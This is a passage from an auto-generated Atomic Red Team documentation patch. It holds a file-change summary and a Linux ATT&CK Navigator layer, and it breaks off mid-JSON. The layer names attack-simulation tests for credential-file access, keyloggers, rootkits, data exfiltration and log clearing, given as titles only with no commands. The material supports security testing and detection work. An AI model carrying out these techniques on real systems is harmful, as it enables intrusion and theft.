From ad2d7c8f139aa44c6a4823e7ca0b4d7b664bd689 Mon Sep 17 00:00:00 2001 
From: Atomic Red Team doc generator
Date: Mon, 6 Nov 2023 22:42:54 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]
---
 .../art-navigator-layer-linux.json | 2 +-
 atomics/Indexes/Indexes-CSV/linux-index.csv | 115 +
 atomics/Indexes/Indexes-Markdown/index.md | 454 +--
 .../Indexes/Indexes-Markdown/linux-index.md | 337 +-
 .../Indexes/Indexes-Markdown/macos-index.md | 144 +-
 .../Indexes/Indexes-Markdown/windows-index.md | 6 +-
 atomics/Indexes/index.yaml | 391 +--
 atomics/Indexes/linux-index.yaml | 2944 ++++++++++++++++-
 atomics/Indexes/macos-index.yaml | 122 +-
 atomics/Indexes/windows-index.yaml | 3 -
 atomics/T1003.007/T1003.007.md | 4 +-
 atomics/T1003.008/T1003.008.md | 8 +-
 atomics/T1007/T1007.md | 2 +-
 atomics/T1016/T1016.md | 2 +-
 atomics/T1018/T1018.md | 6 +-
 atomics/T1027.001/T1027.001.md | 4 +-
 atomics/T1027.004/T1027.004.md | 6 +-
 atomics/T1027/T1027.md | 2 +-
 atomics/T1030/T1030.md | 2 +-
 atomics/T1033/T1033.md | 2 +-
 atomics/T1036.003/T1036.003.md | 2 +-
 atomics/T1036.005/T1036.005.md | 2 +-
 atomics/T1036.006/T1036.006.md | 2 +-
 atomics/T1037.004/T1037.004.md | 2 +-
 atomics/T1040/T1040.md | 6 +-
 atomics/T1046/T1046.md | 2 +-
 atomics/T1048.002/T1048.002.md | 2 +-
 atomics/T1048.003/T1048.003.md | 6 +-
 atomics/T1048/T1048.md | 4 +-
 atomics/T1049/T1049.md | 2 +-
 atomics/T1053.002/T1053.002.md | 2 +-
 atomics/T1053.003/T1053.003.md | 4 +-
 atomics/T1056.001/T1056.001.md | 4 +-
 atomics/T1057/T1057.md | 2 +-
 atomics/T1059.004/T1059.004.md | 20 +-
 atomics/T1059.006/T1059.006.md | 8 +-
 atomics/T1069.001/T1069.001.md | 2 +-
 atomics/T1070.002/T1070.002.md | 10 +-
 atomics/T1070.003/T1070.003.md | 14 +-
 atomics/T1070.004/T1070.004.md | 6 +-
 atomics/T1070.006/T1070.006.md | 8 +-
 atomics/T1071.001/T1071.001.md | 2 +-
 atomics/T1074.001/T1074.001.md | 2 +-
 atomics/T1078.003/T1078.003.md | 6 +-
 atomics/T1082/T1082.md | 10 +-
 atomics/T1083/T1083.md | 4 +-
 atomics/T1087.001/T1087.001.md | 12 +-
 atomics/T1090.001/T1090.001.md | 2 +-
 atomics/T1090.003/T1090.003.md | 2 +-
 atomics/T1098.004/T1098.004.md | 2 +-
 atomics/T1105/T1105.md | 14 +-
 atomics/T1110.001/T1110.001.md | 2 +-
 atomics/T1110.004/T1110.004.md | 2 +-
 atomics/T1113/T1113.md | 4 +-
 atomics/T1124/T1124.md | 2 +-
 atomics/T1132.001/T1132.001.md | 2 +-
 atomics/T1135/T1135.md | 2 +-
 atomics/T1136.001/T1136.001.md | 4 +-
 atomics/T1140/T1140.md | 10 +-
 atomics/T1176/T1176.md | 6 +-
 atomics/T1201/T1201.md | 2 +-
 atomics/T1217/T1217.md | 4 +-
 atomics/T1222.002/T1222.002.md | 16 +-
 atomics/T1485/T1485.md | 2 +-
 atomics/T1486/T1486.md | 8 +-
 atomics/T1496/T1496.md | 2 +-
 atomics/T1497.001/T1497.001.md | 2 +-
 atomics/T1518.001/T1518.001.md | 2 +-
 atomics/T1529/T1529.md | 14 +-
 atomics/T1543.002/T1543.002.md | 2 +-
 atomics/T1546.004/T1546.004.md | 6 +-
 atomics/T1546.005/T1546.005.md | 4 +-
 atomics/T1548.001/T1548.001.md | 10 +-
 atomics/T1548.003/T1548.003.md | 6 +-
 atomics/T1552.001/T1552.001.md | 6 +-
 atomics/T1552.003/T1552.003.md | 2 +-
 atomics/T1552.004/T1552.004.md | 8 +-
 atomics/T1553.004/T1553.004.md | 2 +-
 atomics/T1556.003/T1556.003.md | 2 +-
 atomics/T1560.001/T1560.001.md | 6 +-
 atomics/T1560.002/T1560.002.md | 8 +-
 atomics/T1562.001/T1562.001.md | 4 +-
 atomics/T1562.003/T1562.003.md | 6 +-
 atomics/T1562.004/T1562.004.md | 4 +-
 atomics/T1562.006/T1562.006.md | 4 +-
 atomics/T1564.001/T1564.001.md | 2 +-
 atomics/T1571/T1571.md | 2 +-
 atomics/T1614.001/T1614.001.md | 4 +-
 88 files changed, 3806 insertions(+), 1090 deletions(-)
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
index b74a874384..72328781a6 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
@@ -1 +1 @@ -{"name":"Atomic Red Team (Linux)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Linux"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.007","score":3,"enabled":true,"comment":"\n- Dump individual process memory with sh (Local)\n- Dump individual process memory with Python (Local)\n- Capture Passwords with MimiPenguin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":4,"enabled":true,"comment":"\n- Access /etc/shadow (Local)\n- Access /etc/passwd (Local)\n- Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat\n- Access /etc/{shadow,passwd,master.passwd} with shell builtins\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1007","score":1,"enabled":true,"comment":"\n- System Service Discovery - systemctl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"comment":"\n- Loadable Kernel Module based Rootkit\n- Loadable Kernel Module based Rootkit\n- dynamic-linker based rootkit (libprocesshider)\n- Loadable Kernel Module based Rootkit (Diamorphine)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":1,"enabled":true,"comment":"\n- System Network Configuration Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":5,"enabled":true,"comment":"\n- Remote System Discovery - arp nix\n- Remote System Discovery - sweep\n- Remote System Discovery - ip neighbour\n- Remote System Discovery - ip route\n- Remote System Discovery - ip tcp_metrics\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Decode base64 Data into Script\n"},{"techniqueID":"T1027.001","score":2,"enabled":true,"comment":"\n- Pad Binary to Change Hash - Linux/macOS dd\n- Pad Binary to Change Hash using truncate command - Linux/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":2,"enabled":true,"comment":"\n- Binary simply packed by UPX (linux)\n- Binary packed by UPX, with modified headers (linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":3,"enabled":true,"comment":"\n- C compile\n- CC compile\n- Go compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Data Transfer Size Limits\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":1,"enabled":true,"comment":"\n- System Owner/User Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":1,"enabled":true,"comment":"\n- Masquerading as FreeBSD or Linux crond process.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":1,"enabled":true,"comment":"\n- linux rename /proc/pid/comm using prctl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Execute a process from a directory masquerading as the current parent directory.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":1,"enabled":true,"comment":"\n- Space After Filename\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.004","score":2,"enabled":true,"comment":"\n- rc.common\n- rc.local\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Linux using tshark or 
tcpdump\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo\n- Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo\n- Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":2,"enabled":true,"comment":"\n- Port Scan\n- Port Scan Nmap\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- Exfiltration Over Alternative Protocol - SSH\n- Exfiltration Over Alternative Protocol - SSH\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl freebsd,linux or macos\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":3,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - DNS\n- Python3 http.server\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":1,"enabled":true,"comment":"\n- System Network Connections Discovery FreeBSD, Linux & MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a 
job\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":3,"enabled":true,"comment":"\n- Cron - Replace crontab with referenced file\n- Cron - Add script to all cron subfolders\n- Cron - Add script to /var/spool/cron/crontabs/ folder\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"comment":"\n- Create Systemd Service and Timer\n- Create a user level transient systemd service and timer\n- Create a system level transient systemd service and timer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1056","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":5,"enabled":true,"comment":"\n- Living off the land Terminal Input Capture on Linux with pam.d\n- Logging bash history to syslog\n- Bash session based keylogger\n- SSHD PAM keylogger\n- Auditd keylogger\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1057","score":1,"enabled":true,"comment":"\n- Process Discovery - ps\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"comment":"\n- Create and Execute Bash Shell Script\n- Command-Line Interface\n- Harvest SUID executable files\n- LinEnum tool execution\n- New script file in the tmp 
directory\n- What shell is running\n- What shells are available\n- Command line scripts\n- Obfuscated command line scripts\n- Change login shell\n- Environment variable scripts\n- Detecting pipe-to-shell\n- Current kernel information enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"comment":"\n- Execute shell script via python's command mode arguement\n- Execute Python via scripts\n- Execute Python via Python executables\n- Python pty module and spawn function used to spawn sh or bash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":1,"enabled":true,"comment":"\n- Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.002","score":4,"enabled":true,"comment":"\n- rm -rf\n- Delete system journal logs via rm and journalctl utilities\n- Overwrite Linux Mail Spool\n- Overwrite Linux Log\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":9,"enabled":true,"comment":"\n- Clear Bash history (rm)\n- Clear Bash history (echo)\n- Clear Bash history (cat dev/null)\n- Clear Bash history (ln dev/null)\n- Clear Bash history (truncate)\n- Clear history of a bunch of shells\n- Clear and Disable Bash History Logging\n- Use Space Before Command to Avoid Logging to History\n- Disable Bash History Logging with SSH -T\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":4,"enabled":true,"comment":"\n- Delete a single file - FreeBSD/Linux/macOS\n- Delete an entire folder - FreeBSD/Linux/macOS\n- Overwrite and delete a file with shred\n- Delete Filesystem - Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Set a file's access timestamp\n- Set a file's modification timestamp\n- Set a file's creation timestamp\n- Modify file timestamps using reference file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Linux\n- Copy and Modify Mailbox Data on Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":1,"enabled":true,"comment":"\n- Malicious User Agents - Nix\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":1,"enabled":true,"comment":"\n- Stage data from Discovery.sh\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account (Linux)\n- Reactivate a locked/expired account (Linux)\n- Login as nobody (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":6,"enabled":true,"comment":"\n- List OS Information\n- Linux VM Check via Hardware\n- Linux VM Check via Kernel Modules\n- Hostname Discovery\n- Environment variables discovery on freebsd, macos and linux\n- Linux List Kernel Modules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":2,"enabled":true,"comment":"\n- Nix File and Directory Discovery\n- Nix File and Directory Discovery 2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":6,"enabled":true,"comment":"\n- Enumerate all accounts (Local)\n- View sudoers access\n- View accounts with UID 0\n- List opened files by 
user\n- Show if a user account has ever logged in remotely\n- Enumerate users and groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":1,"enabled":true,"comment":"\n- Active Directory Domain Search\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- Connection Proxy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":1,"enabled":true,"comment":"\n- Tor Proxy Usage - Debian/Ubuntu\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"comment":"\n- Modify SSH Authorized Keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":8,"enabled":true,"comment":"\n- rsync remote file copy (push)\n- rsync remote file copy (pull)\n- scp remote file copy (push)\n- scp remote file copy (pull)\n- sftp remote file copy (push)\n- sftp remote file copy (pull)\n- whois file download\n- Linux Download File and Run\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":2,"enabled":true,"comment":"\n- SUDO Brute Force - Debian\n- SUDO Brute Force - Redhat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- SSH Credential Stuffing From Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- X Windows Capture\n- Capture Linux Desktop using Import Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":1,"enabled":true,"comment":"\n- Add or copy content to clipboard with xClip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- Base64 Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":1,"enabled":true,"comment":"\n- Network Share Discovery - linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":2,"enabled":true,"comment":"\n- Create a user account on a Linux system\n- Create a new 
user in Linux with `root` UID and GID.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":2,"enabled":true,"comment":"\n- Active Directory Create Admin Account\n- Active Directory Create User Account (Non-elevated)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1140","score":6,"enabled":true,"comment":"\n- Base64 decoding with Python\n- Base64 decoding with Perl\n- Base64 decoding with shell utilities\n- Hex decoding with shell utilities\n- Linux Base64 Encoded Shebang in CLI\n- XOR decoding and command execution using Python\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":3,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":4,"enabled":true,"comment":"\n- Examine password complexity policy - Ubuntu\n- Examine password complexity policy - CentOS/RHEL 7.x\n- Examine password complexity policy - CentOS/RHEL 6.x\n- Examine password expiration policy - All Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":1,"enabled":true,"comment":"\n- List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222","score":11,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.002","score":11,"enabled":true,"comment":"\n- chmod - Change file or folder mode (numeric mode)\n- chmod - Change file or folder mode (symbolic mode)\n- chmod - Change file or folder mode (numeric mode) recursively\n- chmod - Change file or folder mode (symbolic mode) recursively\n- chown - Change file or folder ownership and group\n- chown - Change file or folder ownership and group recursively\n- chown - Change file or folder mode ownership only\n- chown - Change file or folder ownership recursively\n- chattr - Remove immutable file attribute\n- Chmod through c script\n- Chown through c script\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- FreeBSD/macOS/Linux - Overwrite file with DD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":4,"enabled":true,"comment":"\n- Encrypt files using gpg (FreeBSD/Linux)\n- Encrypt files using 7z (FreeBSD/Linux)\n- Encrypt files using ccrypt (FreeBSD/Linux)\n- Encrypt files using openssl (FreeBSD/Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"comment":"\n- FreeBSD/macOS/Linux - Simulate CPU Load with Yes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":1,"enabled":true,"comment":"\n- Detect Virtualization Environment 
(Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":1,"enabled":true,"comment":"\n- Security Software Discovery - ps (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":7,"enabled":true,"comment":"\n- Restart System via `shutdown` - FreeBSD/macOS/Linux\n- Shutdown System via `shutdown` - FreeBSD/macOS/Linux\n- Restart System via `reboot` - FreeBSD/macOS/Linux\n- Shutdown System via `halt` - FreeBSD/Linux\n- Reboot System via `halt` - Linux\n- Shutdown System via `poweroff` - FreeBSD/Linux\n- Reboot System via `poweroff` - Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1531","score":1,"enabled":true,"comment":"\n- Change User Password via passwd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1543","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.002","score":2,"enabled":true,"comment":"\n- Create Systemd Service\n- Create Systemd Service file, Enable the service , Modify and Reload the service.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1546","score":8,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.004","score":6,"enabled":true,"comment":"\n- Add command to .bash_profile\n- Add command to .bashrc\n- Append to the system shell profile\n- Append commands user shell profile\n- System shell profile scripts\n- Create/Append to .bash_logout\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":2,"enabled":true,"comment":"\n- Trap EXIT\n- Trap SIGINT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1547","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Linux - Load Kernel Module via insmod\n","links":[{"label":"View 